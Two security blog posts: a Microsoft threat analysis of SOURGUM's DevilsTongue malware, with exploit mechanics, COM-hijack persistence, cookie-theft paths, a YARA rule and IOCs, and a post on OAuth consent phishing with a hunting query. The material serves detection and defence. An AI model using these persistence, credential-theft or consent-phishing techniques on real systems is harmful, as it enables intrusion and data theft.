MSTIC believes SOURGUM is an Israel-based private-sector offensive actor. We would like to thank the Citizen Lab, at the University of Toronto’s Munk School, for sharing the sample of malware that initiated this work and their collaboration during the investigation. In their blog, Citizen Lab asserts with high confidence that SOURGUM is an Israeli company commonly known as Candiru. Third-party reports indicate Candiru produces “hacking tools [that] are used to break into computers and servers”.  

As we shared in the Microsoft on the Issues blog, Microsoft and Citizen Lab have worked together to disable the malware being used by SOURGUM that targeted more than 100 victims around the world including politicians, human rights activists, journalists, academics, embassy workers, and political dissidents. To limit these attacks, Microsoft has created and built protections into our products against this unique malware, which we are calling DevilsTongue. We have shared these protections with the security community so that we can collectively address and mitigate this threat. We have also issued a software update that will protect Windows customers from the associated exploits that the actor used to help deliver its highly sophisticated malware.

SOURGUM victimology

Media reports (1, 2, 3) indicate that PSOAs often sell Windows exploits and malware in hacking-as-a-service packages to government agencies. Agencies in Uzbekistan, United Arab Emirates, and Saudi Arabia are among the list of Candiru’s alleged previous customers. These agencies, then, likely choose whom to target and run the cyberoperations themselves.

Microsoft has identified over 100 victims of SOURGUM’s malware, and these victims are as geographically diverse as would be expected when varied government agencies are believed to be selecting the targets. Approximately half of the victims were found in the Palestinian Authority, with most of the remaining victims located in Israel, Iran, Lebanon, Yemen, Spain (Catalonia), the United Kingdom, Turkey, Armenia, and Singapore. To be clear, the identification of victims of the malware in a country doesn’t necessarily mean that an agency in that country is a SOURGUM customer, as international targeting is common.

Any Microsoft 365 Defender and Microsoft Defender for Endpoint alerts containing detection names for the DevilsTongue malware are signs of compromise by SOURGUM’s malware. We have included a comprehensive list of detection names below for customers to perform additional hunting in their environments.


SOURGUM appears to use a chain of browser and Windows exploits, including 0-days, to install malware on victim boxes. Browser exploits appear to be served via single-use URLs sent to targets on messaging applications such as WhatsApp.

During the investigation, Microsoft discovered two Windows 0-day exploits for vulnerabilities tracked as CVE-2021-31979 and CVE-2021-33771, both of which have been fixed in the July 2021 security updates. These vulnerabilities allow privilege escalation, giving an attacker the ability to escape browser sandboxes and gain kernel code execution. If customers have taken the July 2021 security update, they are protected from these exploits.

CVE-2021-31979 fixes an integer overflow within Windows NT-based operating system (NTOS). This overflow results in an incorrect buffer size being calculated, which is then used to allocate a buffer in the kernel pool. A buffer overflow subsequently occurs while copying memory to the smaller-than-expected destination buffer. This vulnerability can be leveraged to corrupt an object in an adjacent memory allocation. Using APIs from user mode, the kernel pool memory layout can be groomed with controlled allocations, resulting in an object being placed in the adjacent memory location. Once corrupted by the buffer overflow, this object can be turned into a user mode to kernel mode read/write primitive. With these primitives in place, an attacker can then elevate their privileges.
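To make the bug class concrete, here is a minimal, hypothetical illustration (in Python, not the vulnerable NTOS code) of how a size computed in 32-bit arithmetic can wrap, producing a smaller-than-expected allocation size followed by an oversized copy.

```python
# Minimal illustration (NOT SOURGUM's actual code) of the bug class behind
# CVE-2021-31979: a size computed in 32-bit arithmetic wraps, so the kernel
# would allocate a buffer far smaller than the data later copied into it.
MASK32 = 0xFFFFFFFF

def alloc_size_32bit(count: int, element_size: int) -> int:
    """Size calculation as 32-bit C code would perform it (with wraparound)."""
    return (count * element_size) & MASK32
```

For example, 0x40000001 elements of 4 bytes each mathematically need 0x100000004 bytes, but the 32-bit result truncates to 4: a tiny allocation that a subsequent large copy then overflows into adjacent pool memory.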

CVE-2021-33771 addresses a race condition within NTOS resulting in the use-after-free of a kernel object. By using multiple racing threads, the kernel object can be freed, and the freed memory reclaimed by a controllable object. Like the previous vulnerability, the kernel pool memory can be sprayed with allocations using user mode APIs with the hopes of landing an object allocation within the recently freed memory. If successful, the controllable object can be used to form a user mode to kernel mode read/write primitive and elevate privileges.

DevilsTongue malware overview

DevilsTongue is a complex modular multi-threaded piece of malware written in C and C++ with several novel capabilities. Analysis is still ongoing for some components and capabilities, but we’re sharing our present understanding of the malware so defenders can use this intelligence to protect networks and so other researchers can build on our analysis.

For files on disk, PDB paths and PE timestamps are scrubbed, strings and configs are encrypted, and each file has a unique hash. The main functionality resides in DLLs that are encrypted on disk and only decrypted in memory, making detection more difficult. Configuration and tasking data is separate from the malware, which makes analysis harder.  DevilsTongue has both user mode and kernel mode capabilities. There are several novel detection evasion mechanisms built in. All these features are evidence that SOURGUM developers are very professional, have extensive experience writing Windows malware, and have a good understanding of operational security.

When the malware is installed, a first-stage ‘hijack’ malware DLL is dropped in a subfolder of C:\Windows\system32\IME\; the folders and names of the hijack DLLs blend with legitimate names in the \IME\ directories. Encrypted second-stage malware and config files are dropped into subfolders of C:\Windows\system32\config\ with a .dat file extension. A third-party legitimate, signed driver physmem.sys is dropped to the system32 folder. A file called WimBootConfigurations.ini is also dropped; this file contains the command to be run after the COM hijack. Finally, the malware adds the hijack DLL to a COM class registry key, overwriting the legitimate COM DLL path that was there, achieving persistence via COM hijacking.
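As a hedged hunting sketch (not an official detection), the dropped-file locations described above can be turned into a simple path triage check. The helper name and matching rules are illustrative assumptions; legitimate files can also match, so results are candidates for review only.

```python
from pathlib import PureWindowsPath

# Hedged hunting sketch for the DevilsTongue drop locations described above:
# the physmem.sys driver, the WimBootConfigurations.ini file, and .dat files
# under system32\config subfolders. Matches are review candidates only.
def devilstongue_path_candidate(path: str) -> bool:
    p = PureWindowsPath(path)
    parts = [part.lower() for part in p.parts]
    name = p.name.lower()
    if name in ("physmem.sys", "wimbootconfigurations.ini"):
        return True
    return name.endswith(".dat") and "system32" in parts and "config" in parts
```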

From the COM hijacking, the DevilsTongue first-stage hijack DLL gets loaded into a svchost.exe process to run with SYSTEM permissions. The COM hijacking technique means that the original DLL that was in the COM registry key isn’t loaded. This can break system functionality and trigger an investigation that could lead to the discovery of the malware, but DevilsTongue uses an interesting technique to avoid this. In its DllMain function it calls LoadLibrary on the original COM DLL so it is correctly loaded into the process. DevilsTongue then searches the call stack to find the return address of LoadLibraryExW (i.e., the function currently loading the DevilsTongue DLL),  which would usually return the base address of the DevilsTongue DLL.

Once the LoadLibraryExW return address has been found, DevilsTongue allocates a small buffer with shellcode that puts the COM DLL’s base address (imecfmup.7FFE49060000 in Figure 1) into the rax register and then jumps to the original return address of LoadLibraryExW (svchost.7FF78E903BFB in Figures 1 and 2). In Figure 1 the COM DLL is named imecfmup rather than a legitimate COM DLL name because some DevilsTongue samples copied the COM DLL to another location and renamed it.

Figure 1. DevilsTongue return address modification shellcode

DevilsTongue then swaps the original LoadLibraryExW return address on the stack with the address of the shellcode so that when LoadLibraryExW returns it does so into the shellcode (Figures 2 and 3). The shellcode replaces the DevilsTongue base address in rax with the COM DLL’s base address, making it look like LoadLibraryExW has returned the COM DLL’s address. The svchost.exe host process now uses the returned COM DLL base address as it usually would.

Figure 2. Call stack before stack swap, LoadLibraryExW in kernelbase returning to svchost.exe (0x7FF78E903BFB)

Figure 3. Call stack after stack swap, LoadLibraryExW in kernelbase returning to the shellcode address (0x156C51E0000 from Figure 1)

This technique ensures that the DevilsTongue DLL is loaded by the svchost.exe process, giving the malware persistence, but that the legitimate COM DLL is also loaded correctly so there’s no noticeable change in functionality on the victim’s systems.

The hijack DLL then decrypts and loads a second-stage malware DLL from one of the encrypted .dat files. The second-stage malware decrypts another .dat file that contains multiple helper DLLs that it relies on for functionality.

DevilsTongue has standard malware capabilities, including file collection, registry querying, running WMI commands, and querying SQLite databases. It’s capable of stealing victim credentials from both LSASS and from browsers, such as Chrome and Firefox. It also has dedicated functionality to decrypt and exfiltrate conversations from the Signal messaging app.

It can retrieve cookies from a variety of web browsers. These stolen cookies can later be used by the attacker to sign in as the victim to websites to enable further information gathering. Cookies can be collected from these paths (* is a wildcard to match any folders):

  • %LOCALAPPDATA%\Chromium\User Data\*\Cookies
  • %LOCALAPPDATA%\Google\Chrome\User Data\*\Cookies
  • %LOCALAPPDATA%\Microsoft\Windows\INetCookies
  • %LOCALAPPDATA%\Packages\*\AC\*\MicrosoftEdge\Cookies
  • %LOCALAPPDATA%\UCBrowser\User Data_i18n\*\Cookies.9
  • %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\*\Cookies
  • %APPDATA%\Apple Computer\Safari\Cookies\Cookies.binarycookies
  • %APPDATA%\Microsoft\Windows\Cookies
  • %APPDATA%\Mozilla\Firefox\Profiles\*\cookies.sqlite
  • %APPDATA%\Opera Software\Opera Stable\Cookies
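For defenders hunting on a host, the wildcard paths above can be expanded with standard globbing. The sketch below is illustrative only (the function name and the three sampled patterns are our own, not part of DevilsTongue) and shows one way to enumerate candidate cookie stores:

```python
import glob
import os

# A sample of the (environment variable, relative glob) pairs from the list
# above; "*" matches any profile folder name.
COOKIE_PATTERNS = [
    ("LOCALAPPDATA", "Google/Chrome/User Data/*/Cookies"),
    ("APPDATA", "Mozilla/Firefox/Profiles/*/cookies.sqlite"),
    ("APPDATA", "Opera Software/Opera Stable/Cookies"),
]

def expand_cookie_paths(env, patterns=COOKIE_PATTERNS):
    """Expand each pattern against a mapping of environment-variable
    names to base directories, returning the files that exist."""
    hits = []
    for var, rel in patterns:
        base = env.get(var)
        if base:
            hits.extend(glob.glob(os.path.join(base, rel)))
    return hits
```

Passing a mapping such as `{"LOCALAPPDATA": os.environ.get("LOCALAPPDATA", "")}` keeps the helper usable on a live host while remaining testable off-host.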

Interestingly, DevilsTongue seems able to use cookies directly from the victim’s computer on websites such as Facebook, Twitter, Gmail, Yahoo, Odnoklassniki, and Vkontakte to collect information, read the victim’s messages, and retrieve photos. DevilsTongue can also send messages as the victim on some of these websites, making it appear to any recipient that the victim sent those messages. The capability to send messages could be weaponized to send malicious links to more victims.

Alongside DevilsTongue, a third-party signed driver is dropped to C:\Windows\system32\physmem.sys. The driver’s description is “Physical Memory Access Driver,” and it appears to offer a “by-design” kernel read/write capability. DevilsTongue appears to abuse this to proxy certain API calls via the kernel to hinder detection, including making some of the calls appear to come from other processes. Functions capable of being proxied include CreateProcessW, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, and RegSetKeyValueW.

Prevention and detection

To prevent compromise from browser exploits, it’s recommended to use an isolated environment, such as a virtual machine, when opening links from untrusted parties. Using a modern version of Windows 10 with virtualization-based protections, such as Credential Guard, prevents DevilsTongue’s LSASS credential-stealing capabilities. Enabling the attack surface reduction rule “Block abuse of exploited vulnerable signed drivers” in Microsoft Defender for Endpoint blocks the driver that DevilsTongue uses. Network protection blocks known SOURGUM domains.

Detection opportunities

This section is intended to serve as a non-exhaustive guide to help customers and peers in the cybersecurity industry to detect the DevilsTongue malware. We’re providing this guidance with the expectation that SOURGUM will likely change the characteristics we identify for detection in their next iteration of the malware. Given the actor’s level of sophistication, however, we believe that outcome would likely occur irrespective of our public guidance.

File locations

The hijack DLLs are in subfolders of \system32\ime\ with names starting with ‘im’, blended in with legitimate DLLs in those folders. To distinguish malicious from benign: on Windows 10, the legitimate DLLs are signed, whereas the DevilsTongue files aren’t. Example paths:

  • C:\Windows\System32\IME\IMEJP\imjpueact.dll
  • C:\Windows\system32\ime\IMETC\IMTCPROT.DLL
  • C:\Windows\system32\ime\SHARED\imecpmeid.dll

The DevilsTongue configuration files, which are AES-encrypted, are in subfolders of C:\Windows\system32\config\ and have a .dat extension. The exact paths are victim-specific, although some folder names are common across victims. Because the files are AES-encrypted, any file whose size is an exact multiple of 16 bytes can be considered a possible malware config file. The config files are always in newly created folders, not the legitimate existing folders (e.g., on Windows 10, never in \Journal, \systemprofile, \TxR, etc.). Example paths:

  • C:\Windows\system32\config\spp\ServiceState\Recovery\pac.dat
  • C:\Windows\system32\config\cy-GB\Setup\SKB\InputMethod\TupTask.dat
  • C:\Windows\system32\config\config\startwus.dat

Commonly reused folder names in the config file paths:

  • spp
  • SKB
  • curv
  • networklist
  • Licenses
  • InputMethod
  • Recovery
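The size heuristic mentioned above (AES ciphertext lengths are always a multiple of the 16-byte block size) combines naturally with the path characteristics into a simple triage check. A hedged sketch; the function names are our own, illustrative choices:

```python
# Folder names commonly reused in DevilsTongue config paths (from the list above).
SUSPECT_FOLDERS = {"spp", "skb", "curv", "networklist", "licenses", "inputmethod", "recovery"}

def is_candidate_config(path, size):
    """Flag .dat files under system32\\config whose size is a multiple of
    the AES block size (16 bytes). A triage heuristic, not a verdict."""
    path_l = path.lower().replace("\\", "/")
    if "/system32/config/" not in path_l or not path_l.endswith(".dat"):
        return False
    return size > 0 and size % 16 == 0

def uses_known_folder(path):
    """True when the path reuses one of the commonly observed folder names."""
    parts = set(path.lower().replace("\\", "/").split("/"))
    return bool(parts & SUSPECT_FOLDERS)
```

Since the config files are always dropped into newly created folders, a hit inside a legitimate pre-existing folder such as \Journal or \TxR can be discounted.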

The .ini reg file has the unique name WimBootConfigurations.ini and is in a subfolder of system32\ime\. Example paths:

  • C:\Windows\system32\ime\SHARED\WimBootConfigurations.ini
  • C:\Windows\system32\ime\IMEJP\WimBootConfigurations.ini
  • C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini

The Physmem driver is dropped into system32:

  • C:\Windows\system32\physmem.sys


The two COM keys that have been observed being hijacked for persistence are listed below with their default clean values. If their default value DLL is in the \system32\ime\ folder, the DLL is likely DevilsTongue.

  • HKLM\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 = %systemroot%\system32\wbem\wmiutils.dll (clean default value)
  • HKLM\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32 = %systemroot%\system32\wbem\wbemsvc.dll (clean default value)
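Checking these keys can be scripted. Reading the default value itself requires the Windows-only winreg module, so the sketch below isolates the portable part: deciding whether a recovered InprocServer32 value looks hijacked. The function name is illustrative:

```python
# The two CLSID keys observed hijacked (relative to HKLM), from the list above.
HIJACKED_CLSID_KEYS = [
    r"SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32",
    r"SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32",
]

def is_suspicious_com_value(dll_path):
    """Per the guidance above, a default value pointing into \\system32\\ime\\
    is likely DevilsTongue; the clean values live in \\system32\\wbem\\."""
    normalized = dll_path.lower().replace("/", "\\")
    return "\\system32\\ime\\" in normalized
```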

File content and characteristics

The following YARA rule can be used to find the DevilsTongue hijack DLL:

import "pe"

rule DevilsTongue_HijackDll
{
    meta:
        description = "Detects SOURGUM's DevilsTongue hijack DLL"
        author = "Microsoft Threat Intelligence Center (MSTIC)"
        date = "2021-07-15"

    strings:
        $str1 = "windows.old\\windows" wide
        $str2 = "NtQueryInformationThread"
        $str3 = "dbgHelp.dll" wide
        $str4 = "StackWalk64"
        $str5 = "ConvertSidToStringSidW"
        $str6 = "S-1-5-18" wide
        $str7 = "SMNew.dll" // DLL original name

        // Call check in stack manipulation
        // B8 FF 15 00 00   mov     eax, 15FFh
        // 66 39 41 FA      cmp     [rcx-6], ax
        // 74 06            jz      short loc_1800042B9
        // 80 79 FB E8      cmp     byte ptr [rcx-5], 0E8h ; 'è'
        $code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8}

        // PRNG to generate number of times to sleep 1s before exiting
        // 44 8B C0          mov  r8d, eax
        // B8 B5 81 4E 1B    mov  eax, 1B4E81B5h
        // 41 F7 E8          imul r8d
        // C1 FA 05          sar  edx, 5
        // 8B CA             mov  ecx, edx
        // C1 E9 1F          shr  ecx, 1Fh
        // 03 D1             add  edx, ecx
        // 69 CA 2C 01 00 00 imul ecx, edx, 12Ch
        // 44 2B C1          sub  r8d, ecx
        // 45 85 C0          test r8d, r8d
        // 7E 19             jle  short loc_1800014D0
        $code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19}

    condition:
        filesize < 800KB and
        uint16(0) == 0x5A4D and
        (pe.characteristics & pe.DLL) and
        (
            4 of them or
            ($code1 and $code2) or
            pe.imphash() == "9a964e810949704ff7b4a393d9adda60"
        )
}

Microsoft Defender Antivirus detections

Microsoft Defender Antivirus detects DevilsTongue malware with the following detections:

  • Trojan:Win32/DevilsTongue.A!dha
  • Trojan:Win32/DevilsTongue.B!dha
  • Trojan:Script/DevilsTongueIni.A!dha
  • VirTool:Win32/DevilsTongueConfig.A!dha
  • HackTool:Win32/DevilsTongueDriver.A!dha

Microsoft Defender for Endpoint alerts

Alerts with the following titles in the security center can indicate DevilsTongue malware activity on your network:

  • COM Hijacking
  • Possible theft of sensitive web browser information
  • Stolen SSO cookies 

Azure Sentinel query

To locate possible SOURGUM activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)

No malware hashes are being shared because all DevilsTongue files, except for the third-party driver below, have unique hashes and are therefore not a useful indicator of compromise.

Physmem driver

Note that this driver may be used legitimately, but if it’s seen on path C:\Windows\system32\physmem.sys then it is a high-confidence indicator of DevilsTongue activity. The hashes below are provided for the one driver observed in use.

  • MD5: a0e2223868b6133c5712ba5ed20c3e8a
  • SHA-1: 17614fdee3b89272e99758983b99111cbb1b312c
  • SHA-256: c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d
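Because the driver is the one component with stable hashes, it can be checked directly. Below is a minimal verification sketch using Python's standard hashlib; the function names are illustrative:

```python
import hashlib

# SHA-256 of the one physmem.sys driver observed in use (from the list above).
PHYSMEM_SHA256 = "c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d"

def sha256_of_file(path, chunk_size=1 << 20):
    """Hash the file in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def matches_physmem(path):
    return sha256_of_file(path) == PHYSMEM_SHA256
```

As noted above, the hash alone is not conclusive; pair it with the file's presence at C:\Windows\system32\physmem.sys.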

Domains
  • noc-service-streamer[.]com
  • fbcdnads[.]live
  • hilocake[.]info
  • backxercise[.]com
  • winmslaf[.]xyz
  • service-deamon[.]com
  • online-affiliate-mon[.]com
  • codeingasmylife[.]com
  • kenoratravels[.]com
  • weathercheck[.]digital
  • colorpallatess[.]com
  • library-update[.]com
  • online-source-validate[.]com
  • grayhornet[.]com
  • johnshopkin[.]net
  • eulenformacion[.]com
  • pochtarossiy[.]info

The post Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware appeared first on Microsoft Security Blog.

Microsoft delivers comprehensive solution to battle rise in consent phishing emails

July 14th, 2021 No comments

Microsoft threat analysts are tracking a continued increase in consent phishing emails, also called illicit consent grants, that abuse OAuth request links in an attempt to trick recipients into granting attacker-owned apps permissions to access sensitive data.

This blog offers a look into the current state of consent phishing emails as an initial attack vector and what security administrators can do to prevent, detect, and respond to these threats using advanced solutions like Microsoft Defender for Office 365. Consent phishing attacks aim to trick users into granting permissions to malicious cloud apps in order to gain access to users’ legitimate cloud services. The consent screen displays all the permissions the app will receive, and because the cloud service is legitimate, unsuspecting users accept the terms or hit ‘enter,’ which grants the malicious app the requested permissions.

Consent phishing attacks are a specialized form of phishing, so they require a comprehensive, multi-layer defense. It’s important for system administrators to gain visibility and control over apps and the permissions these apps have in their environment. User consent settings with consent policies in Azure Active Directory enable administrators to manage when end users can grant consent to apps. A new app governance add-on feature in Microsoft Cloud App Security provides organizations the visibility to enable them to quickly identify when an app exhibits anomalous behavior.

Microsoft has previously warned against these application-based attacks as many organizations shifted to a remote workforce at the onset of the COVID-19 pandemic. Microsoft’s Digital Crimes Unit (DCU) has in the past also taken steps to disrupt cybercriminal infrastructure used for a particular consent phishing campaign.

The state of consent phishing attacks

Consent phishing attacks abuse legitimate cloud service providers, including Microsoft, Google, and Facebook, that use OAuth 2.0 authorization—a widely used industry protocol that allows third-party apps to access a user’s account and perform actions on their behalf.

The goal of these attacks is to trick unsuspecting users into granting permissions (consent) to malicious attacker-owned applications. This is different from a typical credential harvesting attack, where an attacker looking to steal credentials would craft a convincing email, host a fake landing page, and expect users to fall for the lure. If the attempt is successful, user credentials are then passed on to the attacker.

In a consent phishing attack, the user sign-in takes place at a legitimate identity provider, rather than a fake sign-in page, in an attempt to trick users into granting permissions to malicious attacker-controlled applications. Attackers use the obtained access tokens to retrieve users’ account data from the API resource, without any further action by the user. Targeted users who grant the permissions allow attackers to make API calls on their behalf through the attacker-controlled app. Depending on the permissions granted, the access token can also be used to access other data, such as files, contacts, and other profile details.

Microsoft Defender for Office 365 data shows an increasing use of this technique in recent months.

Figure 1. OAuth phishing URL trend from October 2020

In most cases, consent phishing attacks do not involve password theft, as access tokens don’t require knowledge of the user’s password, yet attackers are still able to steal confidential data and other sensitive information. Attackers can then maintain persistence in the target organization and perform reconnaissance to further compromise the network.

A typical consent phishing attack follows this attack chain:

Figure 2. Consent phishing attack flow

Attackers typically configure apps so that they appear trustworthy, registering them using names like “Enable4Calc”, “SettingsEnabler”, or “Settings4Enabler,” which resemble legitimate business productivity app integrations. Attackers then distribute OAuth 2.0 URLs via conventional email-based phishing attacks, among other possible techniques.

Clicking the URL triggers an authentic consent prompt, asking users to grant the malicious app permissions. Other cloud providers, such as Google, Facebook, or Twitter, display consent prompts or dialog boxes that request users’ permissions on behalf of third-party apps. The permissions requested vary depending on the app.

Figure 3. OAuth apps gain permission by displaying a “Permissions requested” dialog that shows what permissions the third-party is requesting

When users click “accept” or “allow”, the app obtains an authorization code that it redeems for an access token. This access token is then used to make API calls on behalf of the user, giving attackers access to the user’s email, forwarding rules, files, contacts, and other sensitive data and resources.
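The flow described above can be made concrete by constructing an authorization URL. Everything below other than the authorize endpoint is a placeholder (client_id, redirect_uri, scopes); the point is that the link a victim sees begins with the legitimate identity provider's domain even when redirect_uri points at attacker infrastructure:

```python
from urllib.parse import urlencode

AUTHORIZE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"

def build_authorize_url(client_id, redirect_uri, scope):
    """OAuth 2.0 authorization-code request; all argument values below are
    illustrative placeholders, not observed attacker values."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": scope,
    }
    return AUTHORIZE_ENDPOINT + "?" + urlencode(params)

# The host is the real identity provider...
url = build_authorize_url(
    "00000000-0000-0000-0000-000000000000",    # placeholder app ID
    "https://example-attacker.site/callback",  # ...but this parameter lands elsewhere
    "Mail.Read offline_access",
)
```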

Consent phishing campaign: A case study

A recent consent phishing attack we tracked employed social engineering techniques to craft an email that impersonates a business growth solutions company. The message falsely claims to instruct users to review and sign a document, signaling a sense of urgency for the user—a tactic that is apparent in most phishing emails.

Figure 4. Sample email campaign with a Review Doc(s) & Sign link pointing to an OAuth URL

There are several phishing techniques in this email campaign: brand impersonation, personalized email text specific to the recipient or organization, and a recognizable sense of urgency as a social engineering lure.

What differentiates this attack from others is how the OAuth URL serves malicious content: to the email recipient, the “Review Doc(s) & Sign” OAuth URL appears legitimate because it begins with the identity provider’s own URL.

The pattern we observed in this instance is shown in Figure 5. Other providers, such as Google, also format OAuth URLs in a similar manner.

Figure 5. Observed patterns in OAuth URLs pointing to attacker’s domain

Given the recent trend in OAuth abuse, we encourage organizations to look into and prevent this critical threat, beyond what traditional security measures offer.

How Microsoft delivers comprehensive, coordinated defense against consent phishing

The sophisticated and dynamic threat landscape exemplified by consent phishing attacks demonstrates the importance of employing a Zero Trust security model with a multi-layer defense architecture.

Microsoft 365 Defender provides comprehensive protection against consent phishing by coordinating defense across domains using multiple solutions: Microsoft Defender for Office 365, Microsoft Cloud App Security, and Azure Active Directory.

Prevent consent for illegitimate apps with Azure AD user consent settings

The Microsoft identity platform helps prevent consent phishing in a few ways.

With risk-based step-up consent, Azure Active Directory (Azure AD) blocks end users from being able to grant consent to apps that are considered potentially risky. For example, a newly-registered multi-tenant app that has not been publisher-verified might be considered risky, and end users would not be allowed to grant consent, even if they visit the OAuth phishing URL.

Azure AD puts admins in control over when users are allowed to grant consent to apps. This is a powerful mechanism for preventing the threat in the first place, and Microsoft recommends that organizations review settings for when users can grant consent. Microsoft recommends choosing the out-of-the-box option where users are only allowed to consent to apps from verified publishers, and only for chosen, lower risk permissions. For additional granularity, admins can also create custom consent policies, which dictate the conditions for allowing users to grant consent, including for specific apps, publishers, or permissions.

Blocking consent phishing emails with Microsoft Defender for Office 365

Microsoft Defender for Office 365 uses advanced filtering technologies backed by machine learning, IP and URL reputation systems, and unparalleled breadth of signals to provide durable protection against phishing and other malicious emails, helping to block consent phishing campaigns out of the gate. Anti-phishing policies in Defender for Office 365 help protect organizations against impersonation-based phishing attacks.

Microsoft researchers constantly track OAuth 2.0 URL techniques and feed this knowledge back into email filtering systems, helping ensure that Microsoft Defender for Office 365 provides protection against the latest OAuth phishing attacks and other threats. Signals from Microsoft Defender for Office 365 help identify malicious apps, prevent users from accessing them, and provide rich threat data that organizations can query and investigate using advanced hunting capabilities.

Identifying malicious apps with Microsoft Cloud App Security

Microsoft Cloud App Security policies such as activity policies, anomaly detection, and OAuth app policies help organizations manage apps connected to their environment. The new app governance add-on feature to Microsoft Cloud App Security helps organizations:

  • Define appropriate Microsoft 365 app behavior with data, users, and other apps
  • Quickly detect unusual app behavior activity that varies from the baseline, and
  • Disable an app when it behaves differently than expected

Figure 6. App governance in Microsoft 365 Compliance

To give organizations and users confidence in using apps in the Microsoft 365 ecosystem, the Microsoft 365 App Compliance Program enables app developers to establish authenticity of their applications. The program includes publisher verification, publisher attestation, and Microsoft 365 certification.

Investigating and hunting for consent phishing attacks

Security operations teams can use advanced hunting capabilities in Microsoft 365 Defender to locate consent phishing emails and other threats. Microsoft 365 Defender consolidates and correlates email threat data from Microsoft Defender for Office 365, app signals from Microsoft Cloud App Security, and intelligence from other Microsoft services to provide a comprehensive end-to-end view of attacks. Security operations teams can then use the rich tools in Microsoft 365 Defender to investigate and remediate attacks.

OAuth URL pattern redirects to domain with unusual TLD

The consent phishing campaigns we described in this blog used a variety of unusual TLDs for communication with the attacker infrastructure. Use the query below to find inbound emails with suspicious OAuth patterns. The suggested TLDs are based on our investigations; security teams can modify them to expand the search. Run the query in Microsoft 365 Defender.

let UnusualTlds = pack_array('.uno','.host','.site','.tech','.website','.space','.online');
EmailUrlInfo
| where Url startswith "" or Url startswith ""
| where Url has "redirect_uri"
| where Url has_any(UnusualTlds)
| join EmailEvents on $left.NetworkMessageId == $right.NetworkMessageId
| where EmailDirection == "Inbound"
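The same heuristic can be applied outside the portal, for example when triaging an exported list of URLs. A Python sketch mirroring the query's logic (the function name is illustrative):

```python
from urllib.parse import parse_qs, urlparse

# Unusual TLDs from the hunting query above; extend as investigations require.
UNUSUAL_TLDS = (".uno", ".host", ".site", ".tech", ".website", ".space", ".online")

def has_suspicious_redirect(url):
    """Flag OAuth URLs whose redirect_uri parameter lands on an unusual TLD."""
    query = parse_qs(urlparse(url).query)
    for redirect in query.get("redirect_uri", []):
        host = urlparse(redirect).hostname or ""
        if host.endswith(UNUSUAL_TLDS):
            return True
    return False
```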

Best practices for hardening organizations against consent phishing

In addition to taking full advantage of the tools available to them in Microsoft 365 and Microsoft Azure, administrators can further strengthen defenses against consent phishing by following these measures:

Additional resources

The app governance add-on feature for Microsoft Cloud App Security is initially available as a public preview to existing Microsoft Cloud App Security customers in North America and Europe, with other regions being added gradually over the next few months.

To get started with app governance, visit our quick start guide. To learn more about app governance, visit our documentation. To launch the app governance portal in the Microsoft 365 Compliance Center, go to

Refer to our documentation for reference on configuring and managing user consent and app permissions in Azure AD. For more information on Microsoft Cloud App Security refer to our blog and Microsoft Cloud App Security explainer video.

The post Microsoft delivers comprehensive solution to battle rise in consent phishing emails appeared first on Microsoft Security Blog.